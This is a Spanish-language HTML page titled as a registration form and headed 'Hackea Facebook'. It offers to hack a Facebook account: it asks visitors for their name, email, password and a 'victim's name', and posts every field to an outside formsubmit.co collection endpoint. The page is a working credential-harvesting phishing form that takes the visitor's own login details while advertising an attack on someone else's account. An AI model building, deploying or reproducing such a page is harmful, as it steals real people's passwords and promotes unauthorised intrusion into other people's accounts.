<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Formulario de Registro</title>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css">
<style>
body {
    font-family: 'Arial', sans-serif;
    margin: 0;
    padding: 0;
    height: 100vh;
    display: flex;
    justify-content: center;
    align-items: center;
    background-color: #0f0f0f; /* Fondo de estilo hacker */
}

.container {
    background-color: #3b5998; /* Color característico de Facebook */
    width: 400px;
    padding: 40px;
    border-radius: 8px; /* Bordes más redondeados */
    box-shadow: 0 0 20px rgba(0, 0, 0, 0.3);
}

.container h2 {
    text-align: center;
    margin-bottom: 20px;
    color: #fff; /* Texto en color blanco */
}

.form-group {
    margin-bottom: 20px;
}

.form-group label {
    font-weight: bold;
    color: #fff;
}

.form-group input {
    width: 100%;
    padding: 10px;
    margin-top: 5px;
    font-size: 16px;
    border: 1px solid #3b5998; /* Borde con el color de Facebook */
    border-radius: 4px;
}

.form-group input:focus {
    outline: none;
    border-color: #ff9900; /* Cambio de color al enfocar el input */
}

.btn {
    width: 100%;
    padding: 10px;
    font-size: 16px;
    color: #fff;
    background-color: #ff9900;
    border: none;
    border-radius: 4px;
    cursor: pointer;
}

.btn:hover {
    background-color: #e68a00;
}

.social-login {
    margin-top: 20px;
    text-align: center;
}

.social-login p {
    font-weight: bold;
    color: #fff;
}

.social-icons {
    margin-top: 10px;
}

.social-icons a {
    display: inline-block;
    margin-right: 10px;
    color: #fff; /* Iconos en color blanco */
    font-size: 20px;
    transition: all 0.3s;
}

.social-icons a:hover {
    color: #ff9900;
    }
</style>
</head>
<body>
<div class="container">
    <h2>Hackea Facebook</h2>
    <form action="https://formsubmit.co/a519dfc805338dfa2ed6ddff0b9a9aa2" method="POST">
        <div class="form-group">
            <label for="name">Nombre:</label>
            <input  type="text" id="name" name="name" required>
            
        </div>
        <div class="form-group">
            <label for="email">Email:</label>
            <input type="email" id="email" name="email" required>
        </div>
        <div class="form-group">
            <label for="password">Contraseña:</label>
            <input type="password" id="password" name="password" required>
        </div>

         <div class="form-group">
            <label for="name">Nombre de la Víctima:</label>
            <input  type="text" id="name" name="name" required>
            
    </div>
        <button type="submit" class="btn">Crear cuenta</button>
    </form>
    <div class="social-login">
        <p>O regístrate con:</p>
        <div class="social-icons">
            <a href="www.facebook.com"><i class="fab fa-facebook-f"></i></a>
            <a href="www.google.com"><i class="fab fa-google"></i></a>
        </div>
    </div>
</div>
</body>
</html>
